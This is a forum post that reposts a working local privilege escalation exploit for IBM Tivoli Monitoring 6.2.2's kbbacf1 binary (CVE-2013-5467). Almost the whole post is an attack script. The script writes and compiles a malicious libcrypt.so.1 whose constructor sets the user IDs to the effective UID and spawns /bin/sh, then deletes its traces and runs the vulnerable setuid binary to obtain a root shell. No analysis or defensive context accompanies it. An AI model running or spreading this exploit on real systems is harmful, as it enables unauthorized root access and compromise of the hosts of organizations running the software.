Active Members akkiliON Posted October 30, 2014 Active Members Report Share Posted October 30, 2014 IBM Tivoli Monitoring 6.2.2 kbbacf1 - Privilege Escalation#!/bin/sh# Title: IBM Tivoli Monitoring V6.2.2 kbbacf1 privilege escalation exploit# CVE: CVE-2013-5467# Vendor Homepage: http://www-03.ibm.com/software/products/pl/tivomoni# Author: Robert Jaroszuk# Tested on: RedHat 5, Centos 5# Vulnerable version: IBM Tivoli Monitoring V6.2.2 (other versions not tested)#echo "[+] Tivoli pwner kbbacf1 privilege escalation exploit by Robert Jaroszuk"echo "[+] Preparing the code..."cat > kbbacf1-pwn.c << DONE#define _GNU_SOURCE#include <unistd.h>#include <stdlib.h>#include <dlfcn.h>void __cxa_finalize (void *d) { return;}void __attribute__((constructor)) init() { setresuid(geteuid(), geteuid(), geteuid()); execl("/bin/sh", (char *)NULL, (char *)NULL);}DONEcat > version << DONEGLIBC_2.2.5 { };GLIBC_2.3 { };GLIBC_2.3.2 { };GLIBC_PRIVATE { };DONEecho "[+] Preparing the code... part2"/usr/bin/gcc -Wall -fPIC -shared -static-libgcc -Wl,--version-script=version -o libcrypt.so.1 kbbacf1-pwn.cecho "[+] Cleaning up..."/bin/rm -f kbbacf1-pwn.c versionecho "[+] Exploiting."/opt/IBM/ITM/tmaitm6/lx8266/bin/kbbacf1 Quote Link to comment Share on other sites More sharing options...